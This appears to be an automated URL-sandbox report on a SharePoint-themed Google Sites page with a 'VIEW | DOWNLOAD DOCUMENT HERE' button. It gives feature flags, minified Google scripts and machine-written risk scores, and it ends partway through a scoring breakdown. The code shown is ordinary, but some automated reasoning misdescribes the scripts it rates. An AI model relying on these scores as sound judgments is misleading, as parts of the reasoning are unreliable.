Windows Analysis Report
https://sites.google.com/view/01-25sharepoint/

{
    "typosquatting": false,
    "unusual_query_string": false,
    "suspicious_tld": false,
    "ip_in_url": false,
    "long_subdomain": false,
    "malicious_keywords": false,
    "encoded_characters": false,
    "redirection": false,
    "contains_email_address": false,
    "known_domain": true,
    "brand_spoofing_attempt": false,
    "third_party_hosting": false
}

URL: https://sites.google.com

{
    "risk_score": 1,
    "reasoning": "The provided JavaScript snippet appears to be a simple image loading and tracking mechanism, which is a common and benign practice. It does not exhibit any high-risk indicators, such as dynamic code execution, data exfiltration, or suspicious redirects. The code is straightforward and does not appear to have any malicious intent."
}

const imageUrl = 'https:\/\/lh3.googleusercontent.com\/Em7ydyfD18i9P3T-6pc0ImYY-rxD0aqf4GHPA8Zzq_bu1-O_RMfh9_wJAsNlC05IgrP-OvGKTnn8lBUNx_YEEmM\x3dw16383';
      function bgImgLoaded() {
        if (!globals.headerBgImgLoaded) {
          globals.headerBgImgLoaded = new Date().getTime();
        } else {
          globals.headerBgImgLoaded();
        }
      }
      if (imageUrl) {
        const img = new Image();
        img.src = imageUrl;
        img.onload = bgImgLoaded;
        globals.headerBgImgExists = true;
      } else {
        globals.headerBgImgExists = false;
      }
      

{
    "risk_score": 4,
    "reasoning": "The provided JavaScript snippet contains a mix of behaviors that require further review. While it does not exhibit any clear malicious intent, there are some moderate-risk indicators that warrant closer inspection. The script appears to be related to Google services and analytics, but the use of legacy APIs and external data transmission to third-party domains raises some concerns. Additional context would be needed to fully assess the risk level."
}

_at_config = [null,"AIzaSyChg3MFqzdi1P5J-YvEyakkSA1yU7HRcDI","897606708560-a63d8ia0t9dhtpdt4i3djab2m42see7o.apps.googleusercontent.com",null,null,null,null,null,null,null,null,null,null,null,"SITES_%s",null,null,null,null,null,null,null,null,null,["AHKXmL1WwjCMfGxN8ehsanfsd51cdsvZZyRjB3M2LIma76Dm2OIeUpcc0-klEDGIomHasdZWEqwm",1,"CN_46bzM8ooDFW3czgAd7dEa3A",1736767864208479,[5703839,5704621,5706832,5706836,5707711,5737784,5737800,5738513,5738529,5740798,5740814,5743108,5743124,5747267,5748013,5748029,5752678,5752694,5753313,5753329,5754213,5754229,5758807,5758823,5762243,5762259,5764252,5764268,5765535,5765551,5766761,5766777,5773662,5773678,5774331,5774347,5774836,5774852,5776501,5776517,5784931,5784947,5784951,5784967,5791766,5791782,5796457,5796473,14101306,14101502,14101510,14101534,49375314,49375322,49472063,49472071,49622823,49622831,49623173,49623181,49643568,49643576,49644015,49644023,49769337,49769345,49822921,49822929,49823164,49823172,49833462,49833470,49842855,49842863,49924706,49924714,50266222,50266230,50273528,50273536,50297076,50297084,50297426,50297434,50529103,50529111,50561343,50561351,50586962,50586970,70971256,70971264,71035517,71035525,71038255,71038263,71079938,71079946,71085241,71085249,71185170,71185178,71197826,71197834,71238946,71238954,71289146,71289154,71387889,71387897,71411972,71411980,71429507,71429515,71478200,71478208,71478589,71478597,71528417,71528425,71528597,71528605,71530083,71530091,71536689,71536697,71544834,71544842,71545513,71545521,71546425,71546433,71561541,71561549,71573870,71573878,71628154,71628162,71642103,71642111,71652840,71652848,71658040,71658048,71659813,71659821,71689860,71689868,71720760,71721087,71721095,71733083,71733091,71798420,71798436,71798440,71798456,71882106,71882114,71897827,71897835,71960540,71960548,71961126,71961134,94333153,94333161,94353368,94353376,94390153,94390161,94413607,94413615,94434257,94434265,94502654,94502662,94545004,94545012,94597639,94597647,94624855,94624863,94630911,94661802,94661810,94784571,94784579,94875009,94875017,94904089,94904097,94929210,94929218,94942490,94942498,95065889,95065897,95086191,95086199,95087186,95087194,95112873,95112881,95118551,95118559,95135933,95135941,95234185,95234871,95234879,95251262,95251270,95270945,95270953,95314802,95314810,95317975,99237681,99237689,99247596,99247604,99265946,99265954,99310979,99310987,99338440,99338448,99368792,99368800,99402331,99402339,99404818,99452336,99452344,99460069,101442805,101442813,101446888,101446896,101488582,101488590,101488823,101488831,101489187,101489195,101519280,101519288,101562406,101562414,101617516,101617524,101687107,101687115,101701489,101701497,101705087,101708583,101708591,101754342,101754350,101783430,101783446,101801098,101801106,101875084,101875092,101922739,101922747,101922880,101922888,102146090,102146095,102385596]],null,null,null,null,0,null,null,null,null,null,null,null,null,null,"https://drive.google.com",null,null,null,null,null,null,null,null,null,0,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,"v2internal","https://docs.google.com",null,null,null,null,null,null,"https://sites.google.com/new/",null,null,null,null,null,0,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,"",null,null,null,null,null,null,null,null,null,null,null,null,6,null,null,"https://accounts.google.com/o/oauth2/auth","https://accounts.google.com/o/oauth2/postmessageRelay",null,null,null,null,78,"https://sites.google.com/new/?usp\u003dviewer_footer",null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,"https://www.gstatic.com/atari/embeds/83a606

{
    "risk_score": 1,
    "reasoning": "The provided JavaScript snippet appears to be a benign script with no clear malicious intent. It contains some legacy practices like the use of `XDomainRequest`, but these are not inherently harmful. The script seems to be related to analytics or telemetry functionality, which is a common and legitimate use case. Overall, the behaviors observed in the snippet do not raise significant security concerns."
}

"use strict";this.default_vw=this.default_vw||{};(function(_){var window=this;
try{
_.z("MpJwZc");

_.B();
}catch(e){_._DumpException(e)}
try{
_.z("n73qwf");

_.B();
}catch(e){_._DumpException(e)}
try{
_.z("A4UTCb");

_.B();
}catch(e){_._DumpException(e)}
try{
_.z("mzzZzc");
var TNa;_.CB=function(){_.Rl.call(this)};_.I(_.CB,_.Nn);_.CB.la=_.Nn.la;TNa=function(a){a=_.Be(a,function(c){return _.Ae(c)&&(c.id==="yDmH0d"||c.classList.contains("yDmH0d"))});return _.Ae(a)?a:null};_.DB=function(a){if(a){var c;return(c=TNa(a))!=null?c:_.Ce(a).body}a=document;var e;return(e=a.getElementById("yDmH0d"))!=null?e:a.body};_.lo(_.Ro,_.CB);
_.B();
}catch(e){_._DumpException(e)}
try{
_.z("CHCSlb");
_.BB=function(){_.Rl.call(this)};_.I(_.BB,_.Nn);_.BB.la=_.Nn.la;_.lo(_.Voa,_.BB);
_.B();
}catch(e){_._DumpException(e)}
try{
_.z("qAKInc");
_.z3=function(a){_.Rn.call(this,a.La);this.B=this.getData("active").B(!1);this.C=this.S("vyyg5");this.F=_.tf(_.uf(this).Gc().cb(function(){var c=this.U();this.B?c.Sa("qs41qe"):c.Sa("sf4e6b");this.B&&this.C.ld(c.getData("loadingmessage").string(""));this.B||setTimeout(this.D.bind(this),500)}))};_.I(_.z3,_.Rn);_.z3.la=_.Rn.la;_.z3.prototype.isActive=function(){return this.B};_.z3.prototype.setActive=function(a){_.Ch(this.U(),"data-active",a)};
_.z3.prototype.H=function(a){var c=a.data.qA;switch(a.data.name){case "data-active":this.B=c=="true",this.F()}};_.z3.prototype.D=function(){var a=this;_.tf(_.uf(this).cb(function(){var c=a.U();c.ab("sf4e6b")&&(c.Oa("sf4e6b"),a.B||c.Oa("qs41qe"),a.C.ld(""),a.trigger(_.xma))}))()};_.M(_.z3.prototype,"kWijWc",function(){return this.D});_.M(_.z3.prototype,"dyRcpb",function(){return this.H});_.M(_.z3.prototype,"qs41qe",function(){return this.isActive});_.Wo(_.xEa,_.z3);
_.B();
}catch(e){_._DumpException(e)}
try{
_.OLb={Tta:0,P_:1,Ora:2};
}catch(e){_._DumpException(e)}
try{
_.z("abQiW");
_.M3=function(a){_.Rl.call(this);this.C=a.Ba.configuration;this.B=!!_.dj(this.C.get(),213)};_.I(_.M3,_.Nn);_.M3.la=function(){return{Ba:{configuration:_.ko}}};_.lo(_.bA,_.M3);
_.B();
}catch(e){_._DumpException(e)}
try{
_.Ye(_.gLa);
}catch(e){_._DumpException(e)}
try{
_.z("PVlQOd");
var P9=function(){_.Rl.call(this);this.B=null};_.I(P9,_.Nn);P9.la=_.Nn.la;P9.prototype.C=function(){return this.Aa()};P9.prototype.Aa=function(){return this.B};P9.prototype.setActive=function(a){this.B=a instanceof _.jn?a.el():a};_.lo(_.fLa,P9);
_.B();
}catch(e){_._DumpException(e)}
try{
_.z("NPKaK");
_.HNa=new _.gf(_.gLa);
_.B();
}catch(e){_._DumpException(e)}
try{
_.z("BVgquf");
var INa=_.sk("FH2Ite"),JNa=_.sk("HSheMb"),KNa=_.sk("X4390e"),LNa=_.sk("kav0L");var MNa=_.ad("BVgquf",[_.gLa]);var AB=function(a){_.Rl.call(this);this.C=a.service.activeElement;this.ob=null;this.B=new Map;this.J=new Map;this.H=new Map;this.F=new Map;zB(zB(zB(zB(this,27,INa),32,LNa),37,JNa),39,KNa);var c=[];c.push(_.Me(document.body,"keydown",this.D,this));c.push(_.Me(document.body,"keyup",this.R,this));c.push(_.Me(document.body,"keypress",this.I,this));this.addOnDisposeCallback(function(){for(var e=_.r(c),f=e.next();!f.done;f=e.next())_.Ne(f.value)})};_.I(AB,_.Nn);AB.la=function(){return{service:{activeElement:_.HNa}}};
var zB=function(a,c,e){e={Vy:e,qM:function(g){return g.altKey||g.ctrlKey||g.shiftKey||g.metaKey},S9:!1};var f=a.B;f.has(c)||f.set(c,[]);c=f.get(c);NNa(c,e)||c.push(e);return a},NNa=function(a,c){return _.xa(a,function(e){return e.Vy==c.Vy&&e.qM==c.qM})>=0};AB.prototype.D=function(a){ONa(this,a.event,this.B)};AB.prototype.R=function(a){ONa(this,a.event,this.J)};AB.prototype.I=function(a){ONa(this,a.event,this.H);PNa(this,a.event)};
var PNa=function(a,c){if(!QNa(c)){var e=a.F.get(c.ctrlKey||c.metaKey?0:c.charCode);e&&(typeof e==="function"?e(c):RNa(a,c).then(function(f){f&&SNa(f,c,e)}))}},ONa=function(a,c,e){var f=QNa(c);e=e.get(c.keyCode?c.keyCode:c.which)||[];e=_.r(e);for(var g=e.next(),h={};!g.done;h={qs:void 0},g=e.next())h.qs=g.value,!h.qs||h.qs.qM(c)||f&&!h.qs.S9||(typeof h.qs.Vy==="function"?h.qs.Vy(c):RNa(a,c).then(function(l){re

{
    "risk_score": 4,
    "reasoning": "The provided JavaScript snippet appears to be a configuration object with various flags and settings. While it contains some potentially sensitive information, such as error reporting and impression logging, there are no clear indicators of malicious behavior. The script seems to be part of a larger application or framework, and the risk level is moderate due to the potential for data transmission and legacy practices, but without further context, it does not appear to be a high-risk script."
}

_docs_flag_initialData={"atari-emtpr":false,"atari-eibrm":false,"docs-text-elei":false,"docs-text-usc":true,"atari-bae":false,"docs-text-etsrdpn":false,"docs-text-etsrds":false,"docs-text-endes":false,"docs-text-escpv":true,"docs-text-ecfs":false,"docs-text-ecis":true,"docs-text-edctzs":true,"docs-text-eetxpc":false,"docs-text-eetxp":false,"docs-text-ertkmcp":true,"docs-text-ettctvs":false,"docs-text-ettts":true,"docs-text-escoubs":false,"docs-text-escivs":false,"docs-text-escitrbs":false,"docs-text-ecgvd":false,"docs-text-esbbcts":true,"docs-text-etccdts":true,"docs-text-etcchrs":true,"docs-text-etctrs":true,"docs-text-ecvdis":false,"docs-text-elaiabbs":false,"docs-text-eiosmc":false,"docs-text-etb":false,"docs-text-esbefr":false,"docs-text-ipi":false,"docs-etshc":false,"docs-text-tbcb":2.0E7,"docs-efsmsdl":false,"docs-text-etof":false,"docs-text-ehlb":false,"docs-text-epa":true,"docs-text-dwit":false,"docs-text-elawp":false,"docs-eec":false,"docs-ecot":"","docs-sup":"","umss":false,"docs-eldi":false,"docs-dli":false,"docs-liap":"/logImpressions","ilcm":{"eui":"AHKXmL1WwjCMfGxN8ehsanfsd51cdsvZZyRjB3M2LIma76Dm2OIeUpcc0-klEDGIomHasdZWEqwm","je":1,"sstu":1736767864208479,"si":"CN_46bzM8ooDFW3czgAd7dEa3A","gsc":null,"ei":[5703839,5704621,5706832,5706836,5707711,5737784,5737800,5738513,5738529,5740798,5740814,5743108,5743124,5747267,5748013,5748029,5752678,5752694,5753313,5753329,5754213,5754229,5758807,5758823,5762243,5762259,5764252,5764268,5765535,5765551,5766761,5766777,5773662,5773678,5774331,5774347,5774836,5774852,5776501,5776517,5784931,5784947,5784951,5784967,5791766,5791782,5796457,5796473,14101306,14101502,14101510,14101534,49375314,49375322,49472063,49472071,49622823,49622831,49623173,49623181,49643568,49643576,49644015,49644023,49769337,49769345,49822921,49822929,49823164,49823172,49833462,49833470,49842855,49842863,49924706,49924714,50266222,50266230,50273528,50273536,50297076,50297084,50297426,50297434,50529103,50529111,50561343,50561351,50586962,50586970,70971256,70971264,71035517,71035525,71038255,71038263,71079938,71079946,71085241,71085249,71185170,71185178,71197826,71197834,71238946,71238954,71289146,71289154,71387889,71387897,71411972,71411980,71429507,71429515,71478200,71478208,71478589,71478597,71528417,71528425,71528597,71528605,71530083,71530091,71536689,71536697,71544834,71544842,71545513,71545521,71546425,71546433,71561541,71561549,71573870,71573878,71628154,71628162,71642103,71642111,71652840,71652848,71658040,71658048,71659813,71659821,71689860,71689868,71720760,71721087,71721095,71733083,71733091,71798420,71798436,71798440,71798456,71882106,71882114,71897827,71897835,71960540,71960548,71961126,71961134,94333153,94333161,94353368,94353376,94390153,94390161,94413607,94413615,94434257,94434265,94502654,94502662,94545004,94545012,94597639,94597647,94624855,94624863,94630911,94661802,94661810,94784571,94784579,94875009,94875017,94904089,94904097,94929210,94929218,94942490,94942498,95065889,95065897,95086191,95086199,95087186,95087194,95112873,95112881,95118551,95118559,95135933,95135941,95234185,95234871,95234879,95251262,95251270,95270945,95270953,95314802,95314810,95317975,99237681,99237689,99247596,99247604,99265946,99265954,99310979,99310987,99338440,99338448,99368792,99368800,99402331,99402339,99404818,99452336,99452344,99460069,101442805,101442813,101446888,101446896,101488582,101488590,101488823,101488831,101489187,101489195,101519280,101519288,101562406,101562414,101617516,101617524,101687107,101687115,101701489,101701497,101705087,101708583,101708591,101754342,101754350,101783430,101783446,101801098,101801106,101875084,101875092,101922739,101922747,101922880,101922888,102146090,102146095,102385596],"crc":0,"cvi":[]},"docs-ccdil":false,"docs-eil":true,"info_params":{},"buildLabel":"editors.sites-viewer-frontend_20241210.02_p1","docs-show_debug_info":false,"atari-jefp":"/_/view/jserror","docs-jern":"view","atari-rhpp":"/_/view","docs-ecuach":false,"docs-cclt":2033,"docs-ecci":true,"docs-esi":false,"docs

{
    "risk_score": 1,
    "reasoning": "The provided JavaScript snippet appears to be a legitimate script that initializes a feature toggle system. It does not contain any high-risk indicators like dynamic code execution, data exfiltration, or suspicious redirects. The script is well-commented and includes various copyright notices, indicating it is likely part of a larger, reputable codebase. Overall, this script poses a low risk and is likely used for legitimate purposes."
}

"use strict";this.default_vw=this.default_vw||{};(function(_){var window=this;
try{
_._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([0x200c18, ]);
/*

 Copyright The Closure Library Authors.
 SPDX-License-Identifier: Apache-2.0
*/
/*

 Copyright Google LLC
 SPDX-License-Identifier: Apache-2.0
*/
/*

 Copyright 2024 Google, Inc
 SPDX-License-Identifier: MIT
*/
/*
 SPDX-License-Identifier: Apache-2.0
*/
/*

 Copyright Google LLC All Rights Reserved.

 Use of this source code is governed by an MIT-style license that can be
 found in the LICENSE file at https://angular.dev/license
*/
/*

 Copyright 2017 Google LLC
 SPDX-License-Identifier: BSD-3-Clause
*/
/*

 Copyright 2019 Google Inc.

 Permission is hereby granted, free of charge, to any person obtaining a copy
 of this software and associated documentation files (the "Software"), to deal
 in the Software without restriction, including without limitation the rights
 to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 copies of the Software, and to permit persons to whom the Software is
 furnished to do so, subject to the following conditions:

 The above copyright notice and this permission notice shall be included in
 all copies or substantial portions of the Software.

 THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
 IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
 FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
 AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
 LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
 OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
 THE SOFTWARE.
*/
/*

 Copyright 2016 Google Inc.

 Permission is hereby granted, free of charge, to any person obtaining a copy
 of this software and associated documentation files (the "Software"), to deal
 in the Software without restriction, including without limitation the rights
 to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 copies of the Software, and to permit persons to whom the Software is
 furnished to do so, subject to the following conditions:

 The above copyright notice and this permission notice shall be included in
 all copies or substantial portions of the Software.

 THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
 IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
 FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
 AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
 LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
 OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
 THE SOFTWARE.
*/
/*

 Copyright 2020 Google Inc.

 Permission is hereby granted, free of charge, to any person obtaining a copy
 of this software and associated documentation files (the "Software"), to deal
 in the Software without restriction, including without limitation the rights
 to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 copies of the Software, and to permit persons to whom the Software is
 furnished to do so, subject to the following conditions:

 The above copyright notice and this permission notice shall be included in
 all copies or substantial portions of the Software.

 THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
 IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
 FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
 AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
 LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
 OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
 THE SOFTWARE.
*/
/*
 Cop

{
    "risk_score": 3,
    "reasoning": "The provided JavaScript snippet appears to be a utility library with common functionality like character encoding, URL manipulation, and error handling. While it uses some legacy APIs like `XDomainRequest`, the overall behavior seems benign and does not exhibit any high-risk indicators. The script is likely part of a larger application and does not demonstrate any clear malicious intent. Some moderate-risk behaviors, such as external data transmission and fallback domains, are present, but the context suggests these are likely for legitimate purposes. Overall, this script poses a low to medium risk and requires further review to fully assess its impact within the larger application."
}

"use strict";this.default_vw=this.default_vw||{};(function(_){var window=this;
try{
_.JRa=function(a){for(var c=[],e=0,f=0;f<a.length;f++){var g=a.charCodeAt(f);g<128?c[e++]=g:(g<2048?c[e++]=g>>6|192:((g&64512)==55296&&f+1<a.length&&(a.charCodeAt(f+1)&64512)==56320?(g=65536+((g&1023)<<10)+(a.charCodeAt(++f)&1023),c[e++]=g>>18|240,c[e++]=g>>12&63|128):c[e++]=g>>12|224,c[e++]=g>>6&63|128),c[e++]=g&63|128)}return c};_.UC=function(a,c,e){return _.Do(_.Io(a,c),c,e)};_.VC=function(){this.blockSize=-1};
}catch(e){_._DumpException(e)}
try{
var WC,XC,KRa,LRa,PRa,QRa,YC,WRa,XRa,YRa,ZRa,aD,$Ra,bSa,cSa,cD,sD;WC=function(a,c){this.F=a;this.H=c;this.B=!0};XC=function(a){var c={};a=a.replace(/\r/g,"").split("\n");for(var e=0;e<a.length;e++){var f=a[e],g=f.indexOf(":");g<0||(c[f.substring(0,g)]=f.substring(g+2,f.length))}return c};KRa=function(a){var c="";_.cd(a,function(e,f){c+=f+": "+e+"\r\n"});return c};LRa=function(){};_.MRa=function(a){return String.fromCodePoint(a)};_.NRa=function(a,c){return a.indexOf(c)};
_.ORa=function(a,c){return a.B==void 0?_.kt(c,"gaia_session_id"):a.B};PRa=function(a,c){a.D=c};QRa=function(a){return typeof a.B==="string"||Array.isArray(a.B)||_.aza&&a.B instanceof Blob};YC=function(a){return{ReqUri:a.C,ReqContent:a.W,ReqMethod:a.R}};_.ZC=function(a){this.ca=_.w(a)};_.I(_.ZC,_.x);var RRa=function(a){try{return decodeURIComponent(a)}catch(e){var c=_.Dr(e);if(c instanceof _.Fr)return null;throw c.rb;}},SRa=function(a,c){_.Pf.call(this,a,c);_.Br(this,Error(this))};_.I(SRa,_.Pf);
var TRa=function(a){a=new SRa("Deferred errback'ed: "+_.nh(a.B),a,null);_.Br(a,Error(a));return a},URa=function(a,c){_.ae(a,function(e){c.callback(e)},function(e){_.Er(e)?e=TRa(e):e instanceof Error?e=TRa(_.Dr(e)):(e=new SRa("Deferred errback'ed",null,e),_.Br(e,Error(e)));_.av(c,e)})},VRa=function(){this.B=0};_.I(VRa,_.sr);aD=function(a){var c=new VRa;c.B=a;return c};_.bD=function(){_.bD=function(){};_.$C=aD(0);WRa=aD(1);XRa=aD(2);YRa=aD(2);ZRa=aD(3)};$Ra={};cD=function(){this.B=0};_.I(cD,_.sr);
cD.prototype.isError=function(){return this.B!=1};cD.prototype.C=function(){return this.B>=4};cD.prototype.toString=function(){return this.D};
var dD,dSa,eSa,fSa,gSa,hSa,iSa,jSa,eD,kSa,lSa,mSa,nSa,oSa,fD=function(a,c){var e=new cD;e.D=a;e.B=c;_.$s($Ra,a,e);return e},gD=function(){gD=function(){};dD=fD("IDLE",1);dSa=fD("BUSY",1);eSa=fD("RECOVERING",2);fSa=fD("OFFLINE",3);gSa=fD("SERVER_DOWN",3);bSa=fD("FORBIDDEN",4);cSa=fD("AUTH_REQUIRED",4);hSa=fD("SESSION_LIMIT_EXCEEDED",5);iSa=fD("LOCKED",5);jSa=fD("INCOMPATIBLE_SERVER",5);eD=fD("CLIENT_ERROR",5);kSa=fD("CLIENT_FATAL_ERROR",5);lSa=fD("CLIENT_FATAL_ERROR_PENDING_CHANGES",5);fD("BATCH_CLIENT_ERROR",
3);fD("SAVE_ERROR",5);mSa=fD("DOCUMENT_TOO_LARGE",5);fD("BATCH_SAVE_ERROR",3);nSa=fD("DOCS_EVERYWHERE_IMPORT_ERROR",5);_.aSa=fD("POST_LIMIT_EXCEEDED_ERROR",5);oSa=fD("DOCS_QUOTA_EXCEEDED_ERROR",5)},pSa=function(a,c){c=c?c:(gD(),eD);return a==401?(gD(),cSa):a==403?(gD(),bSa):a==421?(gD(),hSa):a==423?(gD(),iSa):a==512||a==432?(gD(),nSa):a==433?(gD(),_.aSa):a==434?(gD(),oSa):a==202||a==405||a==409||a==429||a>=500&&a<=599&&a!=550?(gD(),gSa):a==413?(gD(),mSa):a>=400&&a<=499||a==550?c:(gD(),fSa)},qSa=function(a,
c,e,f){this.D=a;this.tF=c;this.B=e;this.C=f};_.I(qSa,_.sr);var rSa=function(a,c){this.oldValue=a;this.newValue=c};_.I(rSa,_.sr);var hD=function(a){_.ov.call(this);this.value=a};_.I(hD,_.ov);hD.prototype.za=function(){return this.value};_.iD=function(a,c){hD.call(this,a);this.F=!1;this.F=!0===c};_.I(_.iD,hD);_.iD.prototype.ib=function(a){if(!_.tr(this.value,a)){var c=this.value;this.value=a;this.dispatchEvent(new rSa(c,a));this.F&&_.Ge(c)}};_.iD.prototype.ta=function(){this.F&&_.Ge(this.value);hD.prototype.ta.call(this)};
_.jD=function(){this.B=!1;this.FD=new _.ov;this.F=new _.ov;this.C=new _.iD((_.bD(),_.$C),null);this.D=(gD(),dD);this.ja(this.FD);this.ja(this.F);this.ja(this.C)};_.I(_.jD,_.mt);_.jD.prototype.mb=function(a,c,e){var f=this.D;if(!_.tr(a,f)){this.D=a;var g=this.C,h=g.ib;var l=a.tb(bSa)?(_.bD(),Y

{
    "risk_score": 2,
    "reasoning": "The provided JavaScript snippet appears to be a part of the Google API (gapi) library, which is a legitimate and widely-used library for interacting with various Google services. The code does not contain any high-risk indicators, such as dynamic code execution, data exfiltration, or redirects to malicious domains. It primarily sets up a global variable '_F_toggles' and initializes it, which is likely a part of the Google API's feature toggling mechanism. This behavior is consistent with the expected functionality of the Google API library and does not raise any significant security concerns."
}

gapi.loaded_0(function(_){var window=this;
_._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([]);
var ca,da,ha,ma,xa,Aa,Ba;ca=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};
ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};_.la=ha(this);ma=function(a,b){if(b)a:{var c=_.la;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}};
ma("Symbol",function(a){if(a)return a;var b=function(f,h){this.M1=f;da(this,"description",{configurable:!0,writable:!0,value:h})};b.prototype.toString=function(){return this.M1};var c="jscomp_symbol_"+(Math.random()*1E9>>>0)+"_",d=0,e=function(f){if(this instanceof e)throw new TypeError("Symbol is not a constructor");return new b(c+(f||"")+"_"+d++,f)};return e});
ma("Symbol.iterator",function(a){if(a)return a;a=Symbol("Symbol.iterator");for(var b="Array Int8Array Uint8Array Uint8ClampedArray Int16Array Uint16Array Int32Array Uint32Array Float32Array Float64Array".split(" "),c=0;c<b.length;c++){var d=_.la[b[c]];typeof d==="function"&&typeof d.prototype[a]!="function"&&da(d.prototype,a,{configurable:!0,writable:!0,value:function(){return na(ca(this))}})}return a});
var na=function(a){a={next:a};a[Symbol.iterator]=function(){return this};return a},pa=typeof Object.create=="function"?Object.create:function(a){var b=function(){};b.prototype=a;return new b},qa;if(typeof Object.setPrototypeOf=="function")qa=Object.setPrototypeOf;else{var ra;a:{var sa={a:!0},wa={};try{wa.__proto__=sa;ra=wa.a;break a}catch(a){}ra=!1}qa=ra?function(a,b){a.__proto__=b;if(a.__proto__!==b)throw new TypeError(a+" is not extensible");return a}:null}xa=qa;
_.r=function(a,b){a.prototype=pa(b.prototype);a.prototype.constructor=a;if(xa)xa(a,b);else for(var c in b)if(c!="prototype")if(Object.defineProperties){var d=Object.getOwnPropertyDescriptor(b,c);d&&Object.defineProperty(a,c,d)}else a[c]=b[c];a.N=b.prototype};_.ya=function(a){var b=typeof Symbol!="undefined"&&Symbol.iterator&&a[Symbol.iterator];if(b)return b.call(a);if(typeof a.length=="number")return{next:ca(a)};throw Error("b`"+String(a));};
Aa=function(a,b){return Object.prototype.hasOwnProperty.call(a,b)};Ba=typeof Object.assign=="function"?Object.assign:function(a,b){for(var c=1;c<arguments.length;c++){var d=arguments[c];if(d)for(var e in d)Aa(d,e)&&(a[e]=d[e])}return a};ma("Object.assign",function(a){return a||Ba});
ma("Promise",function(a){function b(){this.Ff=null}function c(h){return h instanceof e?h:new e(function(k){k(h)})}if(a)return a;b.prototype.yP=function(h){if(this.Ff==null){this.Ff=[];var k=this;this.zP(function(){k.o8()})}this.Ff.push(h)};var d=_.la.setTimeout;b.prototype.zP=function(h){d(h,0)};b.prototype.o8=function(){for(;this.Ff&&this.Ff.length;){var h=this.Ff;this.Ff=[];for(var k=0;k<h.length;++k){var l=h[k];h[k]=null;try{l()}catch(m){this.mq(m)}}}this.Ff=null};b.prototype.mq=function(h){this.zP(function(){throw h;
})};var e=function(h){this.Ea=0;this.wf=void 0;this.Qr=[];this.OV=!1;var k=this.AF();try{h(k.resolve,k.reject)}catch(l){k.reject(l)}};e.prototype.AF=function(){function h(m){return function(n){l||(l=!0,m.call(k,n))}}var k=this,l=!1;return{resolve:h(this.Cea),reject:h(this.pK)}};e.prototype.Cea=function(h){if(h===this)this.pK(new TypeError("A Promise cannot resolve to itself"));else if(h instanceof e)this.lga(h);else{a:switch(typeof h){case "object":var k=h!=null;break a;case "function":k=!0;break a;
default:k=!1}k?this.Bea(h):this.US(h)}};

{
  "contains_trigger_text": true,
  "trigger_text": "VIEW | DOWNLOAD DOCUMENT HERE",
  "prominent_button_name": "VIEW | DOWNLOAD DOCUMENT HERE",
  "text_input_field_labels": "unknown",
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": false,
  "has_visible_qrcode": false,
  "contains_chinese_text": false,
  "contains_fake_security_alerts": false
}

{
    "risk_score": 3,
    "reasoning": "The provided JavaScript snippet appears to be a combination of utility functions and code execution logic. While it contains some potentially risky behaviors, such as dynamic code execution and data transmission, the overall context suggests it is likely part of a legitimate application or framework. The script does not exhibit clear signs of malicious intent, but it could benefit from further review and optimization to address the identified concerns."
}

The risk score of 3 is assigned based on the following analysis:

1. **High-Risk Indicators (3 points each):**
   - **Dynamic Code Execution:** The script uses the `Function` constructor, which can be used for dynamic code execution. This is a high-risk behavior, adding 3 points.

2. **Moderate-Risk Indicators (2 points each):**
